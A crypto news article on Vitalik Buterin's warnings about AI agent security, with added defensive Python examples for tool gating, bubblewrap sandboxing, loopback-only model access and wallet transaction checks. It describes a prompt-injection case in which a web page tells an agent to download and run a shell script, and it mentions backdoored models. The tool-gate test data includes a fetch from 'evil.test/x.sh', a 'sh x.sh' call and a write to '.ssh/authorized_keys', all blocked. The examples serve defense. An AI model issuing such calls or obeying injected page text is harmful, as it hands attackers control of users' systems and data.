
Vitalik Buterin Warns AI Agents Can Steal Data and Modify Settings Without User Knowledge


Vitalik Buterin warns that cloud-based AI poses serious privacy and security risks, and outlines a local-first setup to keep user data off remote servers.

Soumen Datta

April 3, 2026


Ethereum co-founder Vitalik Buterin has warned that modern AI systems pose serious privacy and security risks, and has called for a shift to local-first AI infrastructure. 

In a detailed blog post, Buterin said cloud-based AI tools give external servers access to sensitive user data, and that newer AI agent systems can take actions without user confirmation, including modifying system settings and sending data to outside servers without any visible indication to the user.

What Are the Security Risks Buterin Is Warning About?

Buterin's concerns go beyond general privacy. He identified specific, documented risks tied to how AI agents operate in practice.

Security researchers have already demonstrated several of these vulnerabilities in real conditions:

  • An agent told to summarize a set of web pages fetched one that was malicious. Text on that page instructed the agent to download and execute a shell script, a prompt-injection attack that handed an external party control of the system.
  • Some agent tools were found to make silent network requests that sent user data to external servers without any notification to the user.
  • Roughly 15% of agent skills reviewed by researchers contained malicious instructions.

Buterin also pointed to risks that are harder to detect. Some models may contain hidden backdoors, features built into a model that activate under specific conditions and cause the system to act in the developer's interest rather than the user's. 

He also noted that most models described as open-source are actually only "open-weights": the trained parameters are published, but the training data and the training process that produced them are not. A user can run such a model but cannot reproduce it, and so cannot independently rule out behavior that was trained into it.

What Is the Difference Between a Chatbot and an AI Agent?

Buterin framed the current moment as a transition point in how AI is being used. Early AI tools operated as chatbots: a user asks a question and the model returns an answer. Agents are different. A user gives the system a task, and it then operates independently, sometimes for extended periods, using dozens or hundreds of tools to complete that task.

That shift significantly expands the risk surface. An agent that can browse the web, read files, send messages, and modify system settings has far more opportunity to cause harm, whether through a security flaw, a manipulation attempt, or a simple mistake, than a system that only answers questions.
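The practical defense against the summarize-a-malicious-page case above, and against the wider tool surface this paragraph describes, is to fix what the agent may do from the user's task before the model reads any untrusted content, so nothing on a page can widen it. The following is an added example written for this article, not code from Buterin's post or from any agent framework; the tool names, task profiles, workspace path and the sample tool calls are hypothetical, and it assumes the model emits tool calls as small dicts of the form `{"tool": name, "args": {...}}`.

```python
"""Least-privilege gating of an LLM agent's tool calls.

Added example; tool names, profiles and sample calls are hypothetical.
The gate sits between the model and the tool runtime: the allowed tools,
hosts and directory are derived from the user's request only, never
from model output, so instructions smuggled into a fetched page cannot
add a shell tool or a new egress host.
"""
import os
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List
from urllib.parse import urlparse

# Capability profiles: which tools each kind of task may call at all.
PROFILES: Dict[str, FrozenSet[str]] = {
    "summarize_web": frozenset({"http_get", "summarize"}),
    "edit_notes":    frozenset({"read_file", "write_file"}),
}


@dataclass
class Decision:
    allowed: bool
    reason: str


@dataclass
class ToolGate:
    """Policy enforcement point between the model and the tool runtime."""
    profile: str
    allowed_hosts: FrozenSet[str]   # hosts the *user* named in the task
    workspace: str                  # the one directory file tools may touch
    audit: List[str] = field(default_factory=list)

    def check(self, call: dict) -> Decision:
        tool, args = call.get("tool"), call.get("args", {})
        if tool not in PROFILES[self.profile]:
            return self._deny(f"{tool!r} is not in profile {self.profile!r}")
        if tool == "http_get":
            host = (urlparse(args.get("url", "")).hostname or "").lower()
            if host not in self.allowed_hosts:
                return self._deny(f"egress to {host!r} was not requested by the user")
        if tool in ("read_file", "write_file"):
            # realpath collapses ../ and symlinks before the prefix check
            real = os.path.realpath(args.get("path", ""))
            root = os.path.realpath(self.workspace)
            if real != root and not real.startswith(root + os.sep):
                return self._deny(f"path {real!r} escapes workspace {root!r}")
        self.audit.append(f"ALLOW {tool} {args}")
        return Decision(True, "ok")

    def _deny(self, why: str) -> Decision:
        self.audit.append(f"DENY {why}")
        return Decision(False, why)


def gate_for_task(profile: str, user_urls: List[str], workspace: str) -> ToolGate:
    """Build the gate from the user's own input, before any page is fetched."""
    hosts = frozenset((urlparse(u).hostname or "").lower() for u in user_urls)
    return ToolGate(profile, hosts, workspace)


def run_scenario() -> List[bool]:
    """Constructed scenario: the user asks for a summary of one page, and the
    page tells the model to fetch and run a script from another host."""
    gate = gate_for_task("summarize_web", ["https://example.org/post"], "/srv/agent-ws")
    model_calls = [   # what a hijacked model might emit, in order
        {"tool": "http_get",   "args": {"url": "https://example.org/post"}},
        {"tool": "http_get",   "args": {"url": "http://evil.test/x.sh"}},
        {"tool": "shell_exec", "args": {"cmd": "sh x.sh"}},
        {"tool": "summarize",  "args": {"text": "page text"}},
    ]
    return [gate.check(c).allowed for c in model_calls]


def run_notes_scenario() -> List[bool]:
    """Constructed scenario: a file tool tries to step out of the workspace."""
    gate = gate_for_task("edit_notes", [], "/srv/agent-notes")
    calls = [
        {"tool": "read_file",  "args": {"path": "/srv/agent-notes/todo.md"}},
        {"tool": "write_file", "args": {"path": "/srv/agent-notes/../.ssh/authorized_keys"}},
    ]
    return [gate.check(c).allowed for c in calls]


if __name__ == "__main__":
    print(run_scenario())          # [True, False, False, True]
    print(run_notes_scenario())    # [True, False]
```

The point of the design is that the second `http_get` and the `shell_exec` are refused by a component the model cannot talk to; the gate's audit list is what you would ship to a log so a silent exfiltration attempt is at least visible.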

How Buterin Set Up His Own Local AI System

Buterin said he has already stopped using cloud-based AI tools. He described his personal setup as "self-sovereign, local, private, and secure," built around three core principles: all AI inference runs on local hardware, all files are stored locally, and every process runs inside a sandbox.

A sandbox, in this context, is an isolated environment that restricts what a program can see and touch. Buterin uses bubblewrap, a Linux user-namespace sandbox that gives the program a fresh filesystem view containing only the directories he explicitly binds into it; the same launcher decides whether the process gets network access and access to audio devices.
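What such a launcher looks like in practice, as an added example rather than Buterin's own scripts: a small policy object is turned into a bubblewrap command line. The flags it emits (`--unshare-all`, `--share-net`, `--die-with-parent`, `--new-session`, `--ro-bind`, `--bind`, `--dev-bind`, `--proc`, `--dev`, `--tmpfs`, `--chdir`, `--`) are real bwrap options; the policy format, the directory names and the tool command in the demo are hypothetical. One caveat a practitioner should know: bubblewrap's network control is a whole network namespace, on or off, so restricting individual ports needs a separate mechanism (a filtering proxy or firewall rules inside the namespace).

```python
"""Turn a small allow-list policy into a bubblewrap (bwrap) command line.

Added example, not Buterin's launcher. Paths not listed in the policy
simply do not exist inside the sandbox, which is the whole point.
"""
import os
import shlex
import subprocess
from dataclasses import dataclass, field
from typing import List

# System directories exposed read-only so binaries and libraries load.
BASE_RO = ("/usr", "/bin", "/lib", "/lib64", "/etc/ssl", "/etc/ld.so.cache")


@dataclass
class SandboxPolicy:
    ro_paths: List[str] = field(default_factory=list)  # visible, read-only
    rw_paths: List[str] = field(default_factory=list)  # visible, writable
    network: bool = False     # False: the process has no network namespace
    audio: bool = False       # True: pass /dev/snd through
    workdir: str = "/"        # cwd inside the sandbox


def _check_paths(policy: SandboxPolicy) -> None:
    """Refuse policies that would quietly expose everything."""
    home = os.path.realpath(os.path.expanduser("~"))
    for p in policy.ro_paths + policy.rw_paths:
        if not os.path.isabs(p):
            raise ValueError(f"bind path must be absolute: {p!r}")
        if os.path.realpath(p) in ("/", home):
            raise ValueError(f"refusing to expose {p!r} wholesale")


def policy_is_valid(policy: SandboxPolicy) -> bool:
    try:
        _check_paths(policy)
        return True
    except ValueError:
        return False


def bwrap_argv(policy: SandboxPolicy, command: List[str]) -> List[str]:
    _check_paths(policy)
    argv = ["bwrap",
            "--unshare-all",       # fresh user/pid/net/ipc/uts namespaces
            "--die-with-parent",   # no orphaned agent if the launcher exits
            "--new-session",       # detach from the caller's controlling tty
            "--proc", "/proc", "--dev", "/dev", "--tmpfs", "/tmp"]
    for d in BASE_RO:
        if os.path.exists(d):
            argv += ["--ro-bind", d, d]
    if policy.network:             # re-share the net namespace, plus DNS config
        argv += ["--share-net", "--ro-bind", "/etc/resolv.conf", "/etc/resolv.conf"]
    if policy.audio and os.path.exists("/dev/snd"):
        argv += ["--dev-bind", "/dev/snd", "/dev/snd"]
    for p in policy.ro_paths:
        argv += ["--ro-bind", p, p]
    for p in policy.rw_paths:
        argv += ["--bind", p, p]
    argv += ["--chdir", policy.workdir, "--"] + list(command)
    return argv


def run(policy: SandboxPolicy, command: List[str], **kw) -> subprocess.CompletedProcess:
    """Launch the command under the policy (needs bwrap installed)."""
    return subprocess.run(bwrap_argv(policy, command), **kw)


def demo_argv() -> List[str]:
    """Constructed policy: model weights read-only, notes writable, no network."""
    policy = SandboxPolicy(ro_paths=["/opt/models"], rw_paths=["/srv/notes"],
                           workdir="/srv/notes")
    return bwrap_argv(policy, ["python3", "agent.py"])   # hypothetical tool


if __name__ == "__main__":
    print(shlex.join(demo_argv()))
```

Run the printed line by hand first; if the tool fails to start, the usual cause is a library directory missing from `BASE_RO` on your distribution, and the fix is another read-only bind, not a writable one.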

Hardware Buterin Tested for Local AI Inference

Buterin tested several hardware setups to find what works for running AI models locally. The results varied meaningfully:

  • A laptop with an NVIDIA 5090 GPU achieved approximately 90 tokens per second using the Qwen3.5:35B model
  • An AMD Ryzen AI Max Pro with 128 GB of unified memory reached approximately 51 tokens per second
  • The DGX Spark, marketed as a desktop AI supercomputer, achieved approximately 60 tokens per second

Buterin set 50 tokens per second as his personal minimum for usable performance. He described anything slower as too frustrating for practical use, and said 90 tokens per second is the ideal. He noted that the DGX Spark underperformed relative to its marketing, producing lower speeds than a good laptop GPU while also requiring additional networking setup to connect from a separate work device.

His software stack centers on llama-server (from llama.cpp), a background process that listens on a port on the local machine and serves an HTTP API compatible with the OpenAI chat-completions API. Software written for OpenAI or Anthropic models can therefore be pointed at the local model by changing its endpoint configuration rather than its code. He also uses llama-swap, a proxy that loads and unloads models on demand so that switching between them is easier.
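Redirecting a client is a one-line change of base URL, but a local-first setup should also enforce that the URL really is local, since a leftover `OPENAI_BASE_URL` or an `http_proxy` variable can silently send prompts off the machine. The following is an added example, not Buterin's code and not part of llama.cpp: a standard-library client for the `/v1/chat/completions` route that llama-server serves (its default bind is 127.0.0.1:8080), which fails closed on any non-loopback host and ignores proxy settings. The stub server in the block is constructed so the example runs offline; it is not llama-server.

```python
"""Point an OpenAI-style client at a local llama-server, and refuse
anything that is not loopback. Added example; stub server is constructed.
"""
import ipaddress
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List
from urllib.parse import urlparse
from urllib.request import ProxyHandler, Request, build_opener

# No proxies, ever: an http_proxy variable must not turn a local call
# into a remote one behind the user's back.
_OPENER = build_opener(ProxyHandler({}))


def assert_local(base_url: str) -> None:
    """Fail closed unless the host is 'localhost' or a loopback IP literal."""
    host = (urlparse(base_url).hostname or "").lower()
    if host == "localhost":
        return
    try:
        if ipaddress.ip_address(host).is_loopback:
            return
    except ValueError:      # a DNS name: we cannot vouch for where it resolves
        pass
    raise ValueError(f"refusing non-loopback LLM endpoint {base_url!r}")


def chat(base_url: str, model: str, messages: List[dict], timeout: float = 120) -> str:
    """One chat-completions round trip; returns the assistant's text."""
    assert_local(base_url)
    body = json.dumps({"model": model, "messages": messages}).encode()
    req = Request(base_url.rstrip("/") + "/v1/chat/completions", data=body,
                  headers={"Content-Type": "application/json"}, method="POST")
    with _OPENER.open(req, timeout=timeout) as resp:
        data = json.load(resp)
    return data["choices"][0]["message"]["content"]


class _StubHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for llama-server: echoes the last user turn."""
    def do_POST(self):
        n = int(self.headers.get("Content-Length", 0))
        req = json.loads(self.rfile.read(n))
        text = f"stub:{req['model']}:{req['messages'][-1]['content']}"
        out = json.dumps({"choices": [{"message": {"role": "assistant",
                                                   "content": text}}]}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(out)))
        self.end_headers()
        self.wfile.write(out)

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_stub():
    srv = HTTPServer(("127.0.0.1", 0), _StubHandler)   # OS picks a free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def demo() -> str:
    srv, url = start_stub()
    try:
        return chat(url, "local-model", [{"role": "user", "content": "hello"}])
    finally:
        srv.shutdown()
        srv.server_close()


def refuses(base_url: str) -> bool:
    """True if chat() rejects the endpoint before sending anything."""
    try:
        chat(base_url, "m", [{"role": "user", "content": "x"}])
    except ValueError:
        return True
    except Exception:
        return False     # got past the check; a network error still means it tried
    return False


if __name__ == "__main__":
    print(demo())                                # stub:local-model:hello
    print(refuses("https://api.openai.com"))     # True
```

The same check belongs on the server side: run llama-server bound to 127.0.0.1 (its default) rather than 0.0.0.0, or the model, and every prompt you send it, is reachable from the whole LAN.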

What Does This Mean for Crypto Wallets?

Buterin's concerns about AI security connect directly to how he thinks AI should be used inside crypto wallets. In comments published on his Farcaster account in March 2026, he outlined a specific technical workflow for AI-assisted transactions.

His position is not that AI should manage funds. It is that AI should propose actions, with independent verification and human confirmation sitting on top of those proposals. For high-value transactions, he described a three-step process: the AI proposes a plan, a local light client simulates the execution of that plan on-chain, and the user reviews both the plain-language description and the simulated outcome before confirming.

A local light client verifies chain data (block headers and the state a transaction touches) against consensus proofs rather than trusting a remote RPC provider, without downloading the full chain. Pairing it with the AI layer means the user sees exactly what a transaction will do before it is broadcast, with the simulation run against locally verified state rather than whatever a third-party interface reports.
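The three steps above, and the prompt-injection concern discussed later on this page, come down to one rule: the model's plain-language claim must be checked against the transaction fields and against a deterministic simulation before a human is ever asked to sign. The following is an added example, not Buterin's code and not any wallet's. Its chain state and `simulate()` are a constructed toy (plain ETH balances, no gas, no contract execution); a real wallet would replace `simulate()` with a light-client-backed `eth_call` or trace against the current head. The addresses in `run_scenarios()` are made up.

```python
"""Propose, simulate, confirm: check the model's words against the bytes
and the bytes against the chain before the human sees anything.
Added example; the simulator and addresses are constructed.
"""
import re
from dataclasses import dataclass
from decimal import Decimal
from typing import Callable, Dict, Optional, Tuple

WEI = 10**18
ADDR_RE = re.compile(r"0x[0-9a-fA-F]{40}")
ETH_RE = re.compile(r"(\d+(?:\.\d+)?)\s*ETH\b")


@dataclass
class Proposal:
    """What the model hands back: words for the human, fields for the chain."""
    description: str
    to: str
    value_wei: int
    data: str = ""          # calldata; empty means a plain transfer


def simulate(state: Dict[str, int], sender: str, p: Proposal) -> Dict[str, int]:
    """Toy simulator: per-address balance deltas, or ValueError on revert."""
    if p.data:
        raise ValueError("toy simulator cannot execute calldata")
    if state.get(sender, 0) < p.value_wei:
        raise ValueError("insufficient balance")
    deltas: Dict[str, int] = {}
    deltas[sender] = deltas.get(sender, 0) - p.value_wei
    to = p.to.lower()
    deltas[to] = deltas.get(to, 0) + p.value_wei
    return deltas


def claims_from_description(desc: str) -> Optional[Tuple[str, int]]:
    """Recipient and amount the human will read, or None if ambiguous."""
    addrs, amounts = ADDR_RE.findall(desc), ETH_RE.findall(desc)
    if len(addrs) != 1 or len(amounts) != 1:
        return None
    return addrs[0].lower(), int(Decimal(amounts[0]) * WEI)


def decide(state: Dict[str, int], sender: str, p: Proposal,
           confirm: Callable[[str], bool]) -> str:
    """Return 'broadcast' or 'reject:<why>'. The model never signs anything."""
    claim = claims_from_description(p.description)
    if claim is None:
        return "reject:description is not a single unambiguous transfer"
    claimed_to, claimed_wei = claim
    # 1. Words vs bytes: the description must match the fields to be signed.
    if claimed_to != p.to.lower() or claimed_wei != p.value_wei:
        return "reject:description does not match transaction fields"
    # 2. Bytes vs chain: the simulated effect must match, independently of the model.
    try:
        deltas = simulate(state, sender, p)
    except ValueError as e:
        return f"reject:simulation failed ({e})"
    if deltas.get(claimed_to) != claimed_wei or deltas.get(sender) != -claimed_wei:
        return "reject:simulated effect differs from claim"
    # 3. Human: sees the description and the simulated outcome side by side.
    shown = p.description + "\n" + "\n".join(
        f"  {addr[:10]}..  {delta / WEI:+.4f} ETH" for addr, delta in deltas.items())
    return "broadcast" if confirm(shown) else "reject:user declined"


def run_scenarios() -> Dict[str, str]:
    me, alice, mallory = "0x" + "11" * 20, "0x" + "aa" * 20, "0x" + "bb" * 20
    state = {me: 5 * WEI}                           # constructed chain state
    always_yes = lambda _shown: True                # a user who clicks through
    honest = Proposal(f"Send 1.5 ETH to {alice}", alice, 3 * WEI // 2)
    # prompt-injected: the text names alice, the bytes go to mallory
    swapped = Proposal(f"Send 1.5 ETH to {alice}", mallory, 3 * WEI // 2)
    # consistent words and bytes, but the chain says it cannot happen
    broke = Proposal(f"Send 9 ETH to {alice}", alice, 9 * WEI)
    return {
        "honest":   decide(state, me, honest, always_yes),
        "swapped":  decide(state, me, swapped, always_yes),
        "broke":    decide(state, me, broke, always_yes),
        "declined": decide(state, me, honest, lambda _shown: False),
    }


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name:9s} {outcome}")
```

Note that the "swapped" case is rejected before the user is shown anything: the mismatch between description and transaction fields is a mechanical check, and a user who habitually clicks through would otherwise be the only defense.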

Why Removing DApp Interfaces Matters

Most crypto users interact with decentralized applications through browser-based frontends. Those interfaces have historically been a significant attack surface. Frontend hijacks, malicious script injections, and fake approval prompts have resulted in hundreds of millions of dollars in losses over recent years.

Buterin argued that AI-powered wallets could remove those interfaces entirely. If a user states what they want to do in plain language and the wallet assembles and simulates the transaction directly, there is no third-party website to compromise. 

"Removing DApp UIs from the picture completely solves a large number of attack vectors, for both theft and privacy," he wrote.

For lower-stakes operations, Buterin sees room for more automation. An AI wallet could reasonably handle monitoring transaction patterns for unusual activity, suggesting gas fees based on current network conditions, routing token swaps through efficient paths, and flagging suspicious contract interactions before approval. These are tasks where errors are recoverable and where automation reduces complexity for non-technical users.

According to Buterin, large language models should not be trusted with unchecked authority over large sums of money. LLMs generate responses from statistical patterns, not deterministic logic. They can misinterpret instructions or be manipulated through prompt injection, in which instructions embedded in data the model reads (a web page, a token's name, a contract's metadata) are followed as if they came from the user. Each layer in his proposed workflow adds an independent check specifically to catch that kind of failure before anything is signed.

Why the AI Agent Market Makes These Risks More Urgent

The concerns Buterin raised are not hypothetical. Industry estimates put the AI agents market at approximately $8 billion in 2025, with projections suggesting growth to over $48 billion by 2030, representing an annual growth rate of more than 43%. As more software is built around autonomous AI systems that operate with reduced human oversight, the security gaps he identified become harder to ignore at scale.

Conclusion

Buterin's warnings are backed by documented research. Security vulnerabilities in AI agents have already been demonstrated in real conditions, and the shift from chatbots to autonomous agents makes those risks harder to contain. 

His local-first setup and three-step wallet workflow are not rejections of AI. They are attempts to use it without surrendering control over data or funds. As AI agents become more capable, the question of who actually controls their actions becomes harder to ignore.

Resources

  1. Vitalik Buterin, "My self-sovereign / local / private / secure LLM setup", blog post, April 2026

  2. Vitalik Buterin, Farcaster post, March 5, 2026

  3. BCC Research, "AI Agents Market to Grow 43.3% Annually Through 2030"

Frequently Asked Questions

What security risks did Vitalik Buterin identify with AI tools?

Buterin identified several specific risks: cloud-based AI systems storing and potentially selling private user data, AI agents modifying system settings or adding communication channels without user confirmation, silent data exfiltration through hidden network requests, jailbreak attacks where malicious inputs manipulate AI behavior, and hidden backdoors in models that activate under specific conditions. Research cited in his post found that roughly 15% of agent skills examined contained malicious instructions.

What is a local-first AI setup and why does Buterin recommend it?

A local-first AI setup runs all model inference and file storage on the user's own hardware rather than on remote servers. Buterin recommends this approach because it prevents user data from reaching external servers that can access, store, or sell it. His own setup uses llama-server for local inference, sandboxing tools to isolate AI processes, and local storage for notes and reference materials. He runs the Qwen3.5:35B model on a laptop with an NVIDIA 5090 GPU, achieving approximately 90 tokens per second.

How does Buterin think AI should be used in crypto wallets?

Buterin supports using AI in wallets as a proposal and monitoring layer, not as an autonomous controller of funds. For high-value transactions, he proposes a workflow where AI suggests an action, a local light client simulates the outcome on-chain, and the user manually confirms before anything is broadcast. For lower-stakes tasks such as gas fee suggestions or flagging suspicious contracts, he sees more room for automation. He explicitly said he would not trust a large language model with multi-million dollar transactions due to the risk of hallucinations and prompt injection attacks.

Disclaimer

Disclaimer: The views expressed in this article do not necessarily represent the views of BSCN. The information provided in this article is for educational and entertainment purposes only and should not be construed as investment advice, or advice of any kind. BSCN assumes no responsibility for any investment decisions made based on the information provided in this article. If you believe that the article should be amended, please reach out to the BSCN team by emailing [email protected].

Author

Soumen Datta

Soumen has been a crypto researcher since 2020 and holds a master's in Physics. His writing and research have been published by CryptoSlate and DailyCoin, as well as BSCN. His areas of focus include Bitcoin, DeFi, and high-potential altcoins like Ethereum, Solana, XRP, and Chainlink. He combines analytical depth with journalistic clarity to deliver insights for both newcomers and seasoned crypto readers.
